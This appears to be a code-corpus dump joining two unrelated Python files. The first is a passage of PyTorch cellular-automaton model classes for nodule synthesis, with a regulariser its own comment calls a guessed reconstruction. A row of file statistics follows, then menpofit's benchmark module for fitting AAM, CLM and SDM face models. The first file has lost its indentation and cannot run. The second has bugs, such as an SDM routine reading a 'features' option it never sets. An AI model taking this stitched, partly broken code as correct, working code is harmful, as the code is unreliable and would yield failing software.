for epoch_in in range(epochs_inside):
x, alive_mask, other = self.forward(x, epoch_in, epoch_outside)
if masked_loss == True:
alive_mask_dilated = (F.max_pool2d(alive_mask[0], 3,1, padding =1 ) > 0.1).float()
target_loss = target_loss_func(x[:,:1, :,:] * alive_mask_dilated, target * alive_mask_dilated)
else:
target_loss = target_loss_func(x[:,:2, :,:] * target[:,1:,...], target * target[:,1:,...]) # used to synthesize almost all nodules
# target_loss = target_loss_func(x[:,:2, :,:], target) # ORIGINAL
loss = target_loss
return loss, x, alive_mask.cpu().numpy(), other.detach().cpu().numpy() #batch_mean_rmse_per_pixel.detach().cpu().numpy()
def forward(self, x, epoch_in, epoch_outside):
'''
nice little forward function for the model
1. fetches an alive mask
2. generates another random mask of 0's and 1's
3. updates the input
4. applies alive mask
'''
mask_previous = alive_mask = (x[:,1:2,:,:] > 0.1).float()
# self_pretraining
if epoch_outside < self.pretrain_thres:
alive_mask = self.get_alive_mask(x)
else:
if epoch_in % self.grow_on_k_iter == 0:
alive_mask = self.get_alive_mask(x)
else:
alive_mask = (x[:,1:2,:,:] > 0.1).float()
mask_previous = torch.zeros_like(alive_mask)#OMM added in CeA
# MASK CLAMP
# | = self.background_intensity
# X = self.step_size
# S = self.scale_mask
# ch0 ch1 ch2 ...
# |||||||||||||| SSSSSSSSSSSSS SSSSSSSSSSSSS SSSSSSSSSSSSS
# |||||XXXX||||| SSSSSSSSSSSSS SSSSSSSSSSSSS SSSSSSSSSSSSS
# |||XX||||XX||| SSSSSSSSSSSSS SSSSSSSSSSSSS SSSSSSSSSSSSS
# ||XX||||||XX|| SSSSSSSSSSSSS SSSSSSSSSSSSS SSSSSSSSSSSSS
# |||XX||||XX||| SSSSSSSSSSSSS SSSSSSSSSSSSS SSSSSSSSSSSSS
# |||||XXXX||||| SSSSSSSSSSSSS SSSSSSSSSSSSS SSSSSSSSSSSSS
# |||||||||||||| SSSSSSSSSSSSS SSSSSSSSSSSSS SSSSSSSSSSSSS
mask_diff = alive_mask - mask_previous
mask_clamp_ch0 = torch.clip((1-mask_diff) + self.background_intensity,0,self.step_size) #make sure this is only applied to the first channel
mask_clamp = torch.repeat_interleave(mask_clamp_ch0,16,1)
mask_clamp_ones = torch.ones_like(torch.squeeze(mask_clamp_ch0))*self.scale_mask
for idx_channel in np.arange(1,16,1):
mask_clamp[:,idx_channel,:,:] = mask_clamp_ones
mask = torch.clamp(torch.round(torch.rand_like(x[:,:1,:,:])) , 0,1)
P = self.perception(x)
Y = self.model(P)
out = x + (Y * mask * mask_clamp)
out *= alive_mask
return out, alive_mask, mask_clamp
# Cell
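# NOTE (not in the original notebook): `sobel_reg` is called by
# ca_model_laplacian_regularizer.train_step below but is not defined anywhere in this
# module. The sketch below is one plausible definition, assuming the regulariser
# penalises the mean absolute Sobel gradient of the first (visible) channel; the
# original implementation may differ.
def sobel_reg(x):
    '''mean absolute Sobel gradient of the first channel, used as a smoothness penalty'''
    sobel_x = (torch.tensor([[-1.0, 0.0, 1.0], [-2.0, 0.0, 2.0], [-1.0, 0.0, 1.0]]) / 8.0).to(x.device)
    grad_x = F.conv2d(x[:, :1, :, :], sobel_x[None, None], padding=1)
    grad_y = F.conv2d(x[:, :1, :, :], sobel_x.T[None, None], padding=1)
    return torch.mean(torch.abs(grad_x) + torch.abs(grad_y))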
class ca_model_laplacian_regularizer(nn.Module):
def __init__(self, checkpoint = None, seq_layers = None, device = 'cuda', grow_on_k_iter=3, background_intensity=.19, step_size=1, scale_mask=1, reg1=1):
'''
Kind of a modular class for a CA model
args:
checkpoint = 'path/to/model.pt'
seq_layers = nn.Sequential(your, pytorch, layers)
device = 'cuda' or 'cpu'
'''
super(ca_model_laplacian_regularizer, self).__init__()
self.ident = torch.tensor([[0.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,0.0]]).to(device)
self.sobel_x = (torch.tensor([[-1.0,0.0,1.0],[-2.0,0.0,2.0],[-1.0,0.0,1.0]])/8.0).to(device)
self.lap = (torch.tensor([[1.0,2.0,1.0],[2.0,-12,2.0],[1.0,2.0,1.0]])/16.0).to(device)
self.grow_on_k_iter = grow_on_k_iter
self.background_intensity = background_intensity
self.step_size = step_size
self.scale_mask = scale_mask
self.reg1 = reg1
if seq_layers is not None:
self.model = seq_layers
else:
self.model = nn.Sequential(
nn.Conv2d(64, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 16, kernel_size = 1, bias = True),
)
'''
initial condition for "do nothing" behaviour:
* all biases should be zero
* the weights of the last layer should be zero
'''
for l in range(len(self.model)):
if isinstance(self.model[l], nn.Conv2d):
self.model[l].bias.data.fill_(0)
if l == len(self.model) -1:
self.model[l].weight.data.fill_(0)
if checkpoint is not None:
self.load_state_dict(torch.load(checkpoint))
self.to(device= device)
def perchannel_conv(self, x, filters):
'''filters: [filter_n, h, w]'''
b, ch, h, w = x.shape
y = x.reshape(b*ch, 1, h, w)
y = torch.nn.functional.pad(y, [1, 1, 1, 1], 'circular')
y = torch.nn.functional.conv2d(y, filters[:,None])
return y.reshape(b, -1, h, w)
def perception(self, x):
filters = torch.stack([self.ident, self.sobel_x, self.sobel_x.T, self.lap])
return self.perchannel_conv(x, filters)
def normalize_grads(self):
'''
gradient normalization for constant step size and to avoid spikes
'''
for p in self.parameters():
p.grad.data = p.grad.data/(p.grad.data.norm()+1e-8)
def get_alive_mask(self, x):
'''
looks for cells that have values over 0.1,
and allows only their adjacent cells to participate in growth
'''
alpha = x[:,1:2,:,:]
pooled = (F.max_pool2d(alpha, 3,1, padding =1 ) > 0.1).float()
return pooled
def train_step(self, seed, target, target_loss_func, epochs_inside, epoch_outside = 1000, masked_loss=False):
'''
a single training step for the model,
feel free to play around with different loss functions like L1 loss
        the loss is calculated for only the leading image/alpha channels of the output
'''
x = seed
for epoch_in in range(epochs_inside):
x, alive_mask, other_mask = self.forward(x, epoch_in, epoch_outside)
# print(x[:,:4, :,:].shape, target.shape)
# batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,:1, :,:] - target)**2),dim=0)
batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,0, :,:] - target[:,0,:,:])**2),dim=0)
if masked_loss == True:
alive_mask_dilated = (F.max_pool2d(alive_mask[0], 3,1, padding =1 ) > 0.1).float()
# alive_mask_dilated = torch.from_numpy(binary_closing(alive_mask[0].cpu().numpy() > 0.1)).float().to('cuda')
target_loss = target_loss_func(x[:,:1, :,:] * alive_mask_dilated, target * alive_mask_dilated)
else:
target_loss = target_loss_func(x[:,:2, :,:] * target[:,1:,...], target * target[:,1:,...]) # used to synthesize almost all nodules
sobel_regularizer = sobel_reg(x)
# print(f' out(x)={x.shape}, sobel_regularizer={sobel_regularizer}')
loss = target_loss + (sobel_regularizer*self.reg1)
return loss, x, alive_mask.cpu().numpy(), other_mask.cpu().numpy() #batch_mean_rmse_per_pixel.detach().cpu().numpy()
def forward(self, x, epoch_in, epoch_outside):
'''
nice little forward function for the model
1. fetches an alive mask
2. generates another random mask of 0's and 1's
3. updates the input
4. applies alive mask
'''
mask_previous = alive_mask = (x[:,1:2,:,:] > 0.1).float()
mode = 0
if epoch_outside < 100:
alive_mask = self.get_alive_mask(x)
mode = 1
else:
if epoch_in % self.grow_on_k_iter == 0:
alive_mask = self.get_alive_mask(x)
mode = 2
else:
alive_mask = (x[:,1:2,:,:] > 0.1).float()
mode = 3
mask_diff = alive_mask - mask_previous
mask_new_cells_clamped = torch.clip((1-mask_diff) + self.background_intensity,0,self.step_size) #make sure this is only applied to the first channel
mask_new_cells_clamped_ones = torch.ones_like(torch.squeeze(mask_new_cells_clamped))*self.scale_mask
mask_new_cells_clamped2 = torch.repeat_interleave(mask_new_cells_clamped,16,1)
for idx_channel in np.arange(1,16,1):
mask_new_cells_clamped2[:,idx_channel,:,:] = mask_new_cells_clamped_ones
mask = torch.clamp(torch.round(torch.rand_like(x[:,:1,:,:])) , 0,1) # original mask used
y = self.perception(x)
out = x + self.model(y)*mask*mask_new_cells_clamped2
out *= alive_mask
# print(f'({epoch_in}) ({mode}) y={y.shape} alive_mask={alive_mask.shape} out={out.shape}')
return out, alive_mask, mask_new_cells_clamped2
# Cell
class ca_model_l2reg(nn.Module):
def __init__(self, checkpoint = None, seq_layers = None, device = 'cuda', grow_on_k_iter=3, background_intensity=.19, step_size=1, scale_mask=1, l2reg=0):
'''
Kind of a modular class for a CA model
args:
checkpoint = 'path/to/model.pt'
seq_layers = nn.Sequential(your, pytorch, layers)
device = 'cuda' or 'cpu'
'''
super(ca_model_l2reg, self).__init__()
self.ident = torch.tensor([[0.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,0.0]]).to(device)
self.sobel_x = (torch.tensor([[-1.0,0.0,1.0],[-2.0,0.0,2.0],[-1.0,0.0,1.0]])/8.0).to(device)
self.lap = (torch.tensor([[1.0,2.0,1.0],[2.0,-12,2.0],[1.0,2.0,1.0]])/16.0).to(device)
self.grow_on_k_iter = grow_on_k_iter
self.background_intensity = background_intensity
self.step_size = step_size
self.scale_mask = scale_mask
self.l2reg = l2reg
if seq_layers is not None:
self.model = seq_layers
else:
self.model = nn.Sequential(
nn.Conv2d(64, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 16, kernel_size = 1, bias = True),
)
'''
initial condition for "do nothing" behaviour:
* all biases should be zero
* the weights of the last layer should be zero
'''
for l in range(len(self.model)):
if isinstance(self.model[l], nn.Conv2d):
self.model[l].bias.data.fill_(0)
if l == len(self.model) -1:
self.model[l].weight.data.fill_(0)
if checkpoint is not None:
self.load_state_dict(torch.load(checkpoint))
self.to(device= device)
def perchannel_conv(self, x, filters):
'''filters: [filter_n, h, w]'''
b, ch, h, w = x.shape
y = x.reshape(b*ch, 1, h, w)
y = torch.nn.functional.pad(y, [1, 1, 1, 1], 'circular')
y = torch.nn.functional.conv2d(y, filters[:,None])
return y.reshape(b, -1, h, w)
def perception(self, x):
filters = torch.stack([self.ident, self.sobel_x, self.sobel_x.T, self.lap])
return self.perchannel_conv(x, filters)
def normalize_grads(self):
'''
gradient normalization for constant step size and to avoid spikes
'''
for p in self.parameters():
p.grad.data = p.grad.data/(p.grad.data.norm()+1e-8)
def get_alive_mask(self, x):
'''
looks for cells that have values over 0.1,
and allows only their adjacent cells to participate in growth
'''
alpha = x[:,1:2,:,:]
pooled = (F.max_pool2d(alpha, 3,1, padding =1 ) > 0.1).float()
return pooled
def train_step(self, seed, target, target_loss_func, epochs_inside, epoch_outside = 1000, masked_loss=False):
'''
a single training step for the model,
feel free to play around with different loss functions like L1 loss
        the loss is calculated for only the leading image/alpha channels of the output
'''
x = seed
for epoch_in in range(epochs_inside):
x, alive_mask, Y = self.forward(x, epoch_in, epoch_outside)
# print(x[:,:4, :,:].shape, target.shape)
# batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,:1, :,:] - target)**2),dim=0)
batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,0, :,:] - target[:,0,:,:])**2),dim=0)
if masked_loss == True:
alive_mask_dilated = (F.max_pool2d(alive_mask[0], 3,1, padding =1 ) > 0.1).float()
# alive_mask_dilated = torch.from_numpy(binary_closing(alive_mask[0].cpu().numpy() > 0.1)).float().to('cuda')
target_loss = target_loss_func(x[:,:1, :,:] * alive_mask_dilated, target * alive_mask_dilated)
else:
target_loss = target_loss_func(x[:,:2, :,:] * target[:,1:,...], target * target[:,1:,...]) # used to synthesize almost all nodules
loss_reg = torch.sum(torch.abs(Y[:,:1,...]))
loss = target_loss + (loss_reg*self.l2reg)
return loss, x, alive_mask.cpu().numpy(), Y.detach().cpu().numpy() #batch_mean_rmse_per_pixel.detach().cpu().numpy()
def forward(self, x, epoch_in, epoch_outside):
'''
nice little forward function for the model
1. fetches an alive mask
2. generates another random mask of 0's and 1's
3. updates the input
4. applies alive mask
'''
mask_previous = alive_mask = (x[:,1:2,:,:] > 0.1).float()
if epoch_outside < 100:
alive_mask = self.get_alive_mask(x)
else:
if epoch_in % self.grow_on_k_iter == 0:
alive_mask = self.get_alive_mask(x)
else:
alive_mask = (x[:,1:2,:,:] > 0.1).float()
mask_diff = alive_mask - mask_previous
mask_new_cells_clamped = torch.clip((1-mask_diff) + self.background_intensity,0,self.step_size) #make sure this is only applied to the first channel
mask_new_cells_clamped_ones = torch.ones_like(torch.squeeze(mask_new_cells_clamped))*self.scale_mask
mask_new_cells_clamped2 = torch.repeat_interleave(mask_new_cells_clamped,16,1)
for idx_channel in np.arange(1,16,1):
mask_new_cells_clamped2[:,idx_channel,:,:] = mask_new_cells_clamped_ones
mask = torch.clamp(torch.round(torch.rand_like(x[:,:1,:,:])) , 0,1) # original mask used
P = self.perception(x)
Y = self.model(P)
out = x + Y *mask*mask_new_cells_clamped2
out *= alive_mask
return out, alive_mask, Y #mask_new_cells_clamped2 | 40.522167 | 169 | 0.586774 | 6,054 | 41,130 | 3.817476 | 0.059465 | 0.014539 | 0.016615 | 0.015231 | 0.876552 | 0.867725 | 0.867206 | 0.855999 | 0.851023 | 0.848081 | 0 | 0.042658 | 0.269317 | 41,130 | 1,015 | 170 | 40.522167 | 0.72635 | 0.200219 | 0 | 0.769634 | 1 | 0.001745 | 0.01574 | 0.007721 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095986 | false | 0 | 0.019197 | 0 | 0.198953 | 0.00349 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3780f41176c4335cc90b285843e882a8598adb65 | 34,202 | py | Python | menpofit/benchmark/predefined.py | trigeorgis/menpofit | 742f4d1aeeb822a615d88ac499df40009b05795f | [
"BSD-3-Clause"
] | 1 | 2015-07-26T18:33:56.000Z | 2015-07-26T18:33:56.000Z | menpofit/benchmark/predefined.py | ersisimou/menpofit | 55ec53205ba31fd42ca054b2ce07590490decb8c | [
"BSD-3-Clause"
] | null | null | null | menpofit/benchmark/predefined.py | ersisimou/menpofit | 55ec53205ba31fd42ca054b2ce07590490decb8c | [
"BSD-3-Clause"
] | null | null | null | from menpo.landmark import ibug_face_68_trimesh
from menpo.feature import sparse_hog, igo
from menpofit.lucaskanade import AIC
from menpofit.transform import OrthoMDTransform, DifferentiablePiecewiseAffine
from menpofit.modelinstance import OrthoPDM
from menpofit.gradientdescent import RLMS
from menpofit.clm.classifier import linear_svm_lr
from .io import import_bounding_boxes
from .base import (aam_build_benchmark, aam_fit_benchmark,
clm_build_benchmark, clm_fit_benchmark,
sdm_build_benchmark, sdm_fit_benchmark,
load_database, convert_fitting_results_to_ced,
plot_fitting_curves)
def aam_fastest_alternating_noise(training_db_path, fitting_db_path,
features=igo, noise_std=0.04,
verbose=False, plot=False):
# predefined options
error_type = 'me_norm'
db_loading_options = {'crop_proportion': 0.2,
'convert_to_grey': True
}
training_options = {'group': 'PTS',
'features': igo,
'transform': DifferentiablePiecewiseAffine,
'trilist': ibug_face_68_trimesh,
'normalization_diagonal': None,
'n_levels': 3,
'downscale': 2,
'scaled_shape_models': True,
'max_shape_components': 25,
'max_appearance_components': 250,
'boundary': 3
}
fitting_options = {'algorithm': AIC,
'md_transform': OrthoMDTransform,
'n_shape': [3, 6, 12],
'n_appearance': 50,
'max_iters': 50,
'error_type': 'me_norm'
}
perturb_options = {'noise_std': 0.04,
'rotation': False}
# set passed parameters
training_options['features'] = features
perturb_options['noise_std'] = noise_std
# run experiment
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
aam = aam_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
fitting_results = aam_fit_benchmark(fitting_images, aam,
perturb_options=perturb_options,
fitting_options=fitting_options,
verbose=verbose)
# convert results
max_error_bin = 0.05
bins_error_step = 0.005
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(fitting_results,
max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
# plot results
if plot:
title = "AAMs using {} and Alternating IC".format(
training_options['features'].__name__)
y_axis = [final_error_curve, initial_error_curve]
legend = ['Fitting', 'Initialization']
plot_fitting_curves(error_bins, y_axis, title, new_figure=True,
x_limit=max_error_bin, legend_entries=legend,
line_colour=['r', 'b'],
marker_face_colour=['r', 'b'],
marker_style=['o', 'x'])
return fitting_results, final_error_curve, initial_error_curve, error_bins
def aam_fastest_alternating_bbox(training_db_path, fitting_db_path,
fitting_bboxes_path, features=igo,
verbose=False, plot=False):
# predefined options
error_type = 'me_norm'
db_loading_options = {'crop_proportion': 0.1,
'convert_to_grey': True
}
training_options = {'group': 'PTS',
'features': [igo] * 3,
'transform': DifferentiablePiecewiseAffine,
'trilist': ibug_face_68_trimesh,
'normalization_diagonal': None,
'n_levels': 3,
'downscale': 2,
'scaled_shape_models': True,
'max_shape_components': 25,
'max_appearance_components': 250,
'boundary': 3
}
fitting_options = {'algorithm': AIC,
'md_transform': OrthoMDTransform,
'n_shape': [3, 6, 12],
'n_appearance': 50,
'max_iters': 50,
'error_type': 'me_norm'
}
# set passed parameters
training_options['features'] = features
# run experiment
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
aam = aam_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
# import bounding boxes
bboxes_list = import_bounding_boxes(fitting_bboxes_path)
    # for all fittings, crop using the crop_proportion defined above
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
bounding_boxes=bboxes_list,
verbose=verbose)
fitting_results = aam_fit_benchmark(fitting_images, aam,
fitting_options=fitting_options,
verbose=verbose)
# convert results
max_error_bin = 0.05
bins_error_step = 0.005
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(fitting_results,
max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
# plot results
if plot:
title = "AAMs using {} and Alternating IC".format(
training_options['features'].__name__)
y_axis = [final_error_curve, initial_error_curve]
legend = ['Fitting', 'Initialization']
plot_fitting_curves(error_bins, y_axis, title, new_figure=True,
x_limit=max_error_bin, legend_entries=legend,
line_colour=['r', 'b'],
marker_face_colour=['r', 'b'],
marker_style=['o', 'x'])
return fitting_results, final_error_curve, initial_error_curve, error_bins
def aam_best_performance_alternating_noise(training_db_path, fitting_db_path,
features=igo, noise_std=0.04,
verbose=False, plot=False):
# predefined options
error_type = 'me_norm'
db_loading_options = {'crop_proportion': 0.2,
'convert_to_grey': True
}
training_options = {'group': 'PTS',
'features': igo,
'transform': DifferentiablePiecewiseAffine,
'trilist': ibug_face_68_trimesh,
'normalization_diagonal': None,
'n_levels': 3,
'downscale': 1.2,
'scaled_shape_models': False,
'max_shape_components': 25,
'max_appearance_components': 250,
'boundary': 3
}
fitting_options = {'algorithm': AIC,
'md_transform': OrthoMDTransform,
'n_shape': [3, 6, 12],
'n_appearance': 50,
'max_iters': 50,
'error_type': error_type
}
perturb_options = {'noise_std': 0.04,
'rotation': False}
# set passed parameters
training_options['features'] = features
perturb_options['noise_std'] = noise_std
# run experiment
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
aam = aam_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
fitting_results = aam_fit_benchmark(fitting_images, aam,
perturb_options=perturb_options,
fitting_options=fitting_options,
verbose=verbose)
# convert results
max_error_bin = 0.05
bins_error_step = 0.005
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(fitting_results,
max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
# plot results
if plot:
title = "AAMs using {} and Alternating IC".format(
training_options['features'].__name__)
y_axis = [final_error_curve, initial_error_curve]
legend = ['Fitting', 'Initialization']
plot_fitting_curves(error_bins, y_axis, title, new_figure=True,
x_limit=max_error_bin, legend_entries=legend,
line_colour=['r', 'b'],
marker_face_colour=['r', 'b'],
marker_style=['o', 'x'])
return fitting_results, final_error_curve, initial_error_curve, error_bins
def aam_best_performance_alternating_bbox(training_db_path, fitting_db_path,
fitting_bboxes_path,
features=igo, verbose=False,
plot=False):
# predefined options
error_type = 'me_norm'
db_loading_options = {'crop_proportion': 0.5,
'convert_to_grey': True
}
training_options = {'group': 'PTS',
'features': igo,
'transform': DifferentiablePiecewiseAffine,
'trilist': ibug_face_68_trimesh,
'normalization_diagonal': 200,
'n_levels': 3,
'downscale': 2,
'scaled_shape_models': True,
'max_shape_components': 25,
'max_appearance_components': 100,
'boundary': 3
}
fitting_options = {'algorithm': AIC,
'md_transform': OrthoMDTransform,
'n_shape': [3, 6, 12],
'n_appearance': 50,
'max_iters': 50,
'error_type': error_type
}
# set passed parameters
training_options['features'] = features
# run experiment
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
aam = aam_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
# import bounding boxes
bboxes_list = import_bounding_boxes(fitting_bboxes_path)
# for all fittings, we crop to 0.5
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
bounding_boxes=bboxes_list,
verbose=verbose)
fitting_results = aam_fit_benchmark(fitting_images, aam,
fitting_options=fitting_options,
verbose=verbose)
# convert results
max_error_bin = 0.05
bins_error_step = 0.005
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(fitting_results,
max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
# plot results
if plot:
title = "AAMs using {} and Alternating IC".format(
training_options['features'].__name__)
y_axis = [final_error_curve, initial_error_curve]
legend = ['Fitting', 'Initialization']
plot_fitting_curves(error_bins, y_axis, title, new_figure=True,
x_limit=max_error_bin, legend_entries=legend,
line_colour=['r', 'b'],
marker_face_colour=['r', 'b'],
marker_style=['o', 'x'])
return fitting_results, final_error_curve, initial_error_curve, error_bins
def clm_basic_noise(training_db_path, fitting_db_path,
features=sparse_hog, classifier_trainers=linear_svm_lr,
noise_std=0.04, verbose=False, plot=False):
# predefined options
error_type = 'me_norm'
db_loading_options = {'crop_proportion': 0.4,
'convert_to_grey': True
}
training_options = {'group': 'PTS',
'classifier_trainers': linear_svm_lr,
'patch_shape': (5, 5),
'features': [sparse_hog] * 3,
'normalization_diagonal': None,
'n_levels': 3,
'downscale': 1.1,
'scaled_shape_models': True,
'max_shape_components': None,
'boundary': 3
}
fitting_options = {'algorithm': RLMS,
'pdm_transform': OrthoPDM,
'n_shape': [3, 6, 12],
'max_iters': 50,
'error_type': error_type
}
perturb_options = {'noise_std': 0.01,
'rotation': False}
# set passed parameters
training_options['features'] = features
training_options['classifier_trainers'] = classifier_trainers
perturb_options['noise_std'] = noise_std
# run experiment
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
clm = clm_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
fitting_results = clm_fit_benchmark(fitting_images, clm,
perturb_options=perturb_options,
fitting_options=fitting_options,
verbose=verbose)
# convert results
max_error_bin = 0.05
bins_error_step = 0.005
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(fitting_results,
max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
# plot results
if plot:
title = "CLMs with {} and {} classifier using RLMS".format(
training_options['features'].__name__,
training_options['classifier_trainers'])
y_axis = [final_error_curve, initial_error_curve]
legend = ['Fitting', 'Initialization']
plot_fitting_curves(error_bins, y_axis, title, new_figure=True,
x_limit=max_error_bin, legend_entries=legend,
line_colour=['r', 'b'],
marker_face_colour=['r', 'b'],
marker_style=['o', 'x'])
return fitting_results, final_error_curve, initial_error_curve, error_bins
def clm_basic_bbox(training_db_path, fitting_db_path, fitting_bboxes_path,
features=sparse_hog, classifier_trainers=linear_svm_lr,
verbose=False, plot=False):
# predefined options
error_type = 'me_norm'
db_loading_options = {'crop_proportion': 0.5,
'convert_to_grey': True
}
training_options = {'group': 'PTS',
'classifier_trainers': linear_svm_lr,
'patch_shape': (5, 5),
'features': [sparse_hog] * 3,
'normalization_diagonal': None,
'n_levels': 3,
'downscale': 1.1,
'scaled_shape_models': True,
'max_shape_components': None,
'boundary': 3
}
fitting_options = {'algorithm': RLMS,
'pdm_transform': OrthoPDM,
'n_shape': [3, 6, 12],
'max_iters': 50,
'error_type': error_type
}
# set passed parameters
training_options['features'] = features
training_options['classifier_trainers'] = classifier_trainers
# run experiment
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
clm = clm_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
# import bounding boxes
bboxes_list = import_bounding_boxes(fitting_bboxes_path)
# for all fittings, we crop to 0.5
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
bounding_boxes=bboxes_list,
verbose=verbose)
fitting_results = clm_fit_benchmark(fitting_images, clm,
fitting_options=fitting_options,
verbose=verbose)
# convert results
max_error_bin = 0.05
bins_error_step = 0.005
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(fitting_results,
max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
# plot results
if plot:
title = "CLMs with {} and {} classifier using RLMS".format(
training_options['features'].__name__,
training_options['classifier_trainers'])
y_axis = [final_error_curve, initial_error_curve]
legend = ['Fitting', 'Initialization']
plot_fitting_curves(error_bins, y_axis, title, new_figure=True,
x_limit=max_error_bin, legend_entries=legend,
line_colour=['r', 'b'],
marker_face_colour=['r', 'b'],
marker_style=['o', 'x'])
return fitting_results, final_error_curve, initial_error_curve, error_bins
def sdm_fastest_bbox(training_db_path, fitting_db_path,
fitting_bboxes_path, features=None,
verbose=False, plot=False):
# predefined options
error_type = 'me_norm'
db_loading_options = {'crop_proportion': 0.8,
'convert_to_grey': True
}
training_options = {'group': 'PTS',
'normalization_diagonal': 200,
'n_levels': 4,
'downscale': 1.01,
'noise_std': 0.08,
'patch_shape': (16, 16),
'n_perturbations': 15,
}
fitting_options = {
'error_type': error_type
}
# run experiment
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
sdm = sdm_build_benchmark(training_images,
training_options=training_options,
verbose=verbose)
# import bounding boxes
bboxes_list = import_bounding_boxes(fitting_bboxes_path)
    # for all fittings, crop using the crop_proportion defined above
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
bounding_boxes=bboxes_list,
verbose=verbose)
fitting_results = sdm_fit_benchmark(fitting_images, sdm,
fitting_options=fitting_options,
verbose=verbose)
# convert results
max_error_bin = 0.05
bins_error_step = 0.005
final_error_curve, initial_error_curve, error_bins = \
convert_fitting_results_to_ced(fitting_results,
max_error_bin=max_error_bin,
bins_error_step=bins_error_step,
error_type=error_type)
# plot results
if plot:
title = "SDMs using default (sparse hogs)".format(
training_options['features'].__name__)
y_axis = [final_error_curve, initial_error_curve]
legend = ['Fitting', 'Initialization']
plot_fitting_curves(error_bins, y_axis, title, new_figure=True,
x_limit=max_error_bin, legend_entries=legend,
line_colour=['r', 'b'],
marker_face_colour=['r', 'b'],
marker_style=['o', 'x'])
return fitting_results, final_error_curve, initial_error_curve, error_bins
def aam_params_combinations_noise(training_db_path, fitting_db_path,
n_experiments=1, features=None,
scaled_shape_models=None,
n_shape=None,
n_appearance=None, noise_std=None,
rotation=None, verbose=False, plot=False):
# parse input
if features is None:
features = [igo] * n_experiments
    elif len(features) != n_experiments:
raise ValueError("features has wrong length")
if scaled_shape_models is None:
scaled_shape_models = [True] * n_experiments
    elif len(scaled_shape_models) != n_experiments:
raise ValueError("scaled_shape_models has wrong length")
if n_shape is None:
n_shape = [[3, 6, 12]] * n_experiments
    elif len(n_shape) != n_experiments:
raise ValueError("n_shape has wrong length")
if n_appearance is None:
n_appearance = [50] * n_experiments
    elif len(n_appearance) != n_experiments:
raise ValueError("n_appearance has wrong length")
if noise_std is None:
noise_std = [0.04] * n_experiments
    elif len(noise_std) != n_experiments:
raise ValueError("noise_std has wrong length")
if rotation is None:
rotation = [False] * n_experiments
    elif len(rotation) != n_experiments:
raise ValueError("rotation has wrong length")
# load images
db_loading_options = {'crop_proportion': 0.1,
'convert_to_grey': True
}
training_images = load_database(training_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
fitting_images = load_database(fitting_db_path,
db_loading_options=db_loading_options,
verbose=verbose)
# run experiments
max_error_bin = 0.05
bins_error_step = 0.005
curves_to_plot = []
all_fitting_results = []
for i in range(n_experiments):
if verbose:
print("\nEXPERIMENT {}/{}:".format(i + 1, n_experiments))
print("- features: {}\n- scaled_shape_models: {}\n"
"- n_shape: {}\n"
"- n_appearance: {}\n- noise_std: {}\n"
"- rotation: {}".format(
features[i], scaled_shape_models[i],
n_shape[i], n_appearance[i], noise_std[i], rotation[i]))
# predefined option dictionaries
error_type = 'me_norm'
training_options = {'group': 'PTS',
'features': igo,
'transform': DifferentiablePiecewiseAffine,
'trilist': ibug_face_68_trimesh,
'normalization_diagonal': None,
'n_levels': 3,
'downscale': 1.1,
'scaled_shape_models': True,
'max_shape_components': 25,
'max_appearance_components': 250,
'boundary': 3
}
fitting_options = {'algorithm': AIC,
'md_transform': OrthoMDTransform,
'n_shape': [3, 6, 12],
'n_appearance': 50,
'max_iters': 50,
'error_type': error_type
}
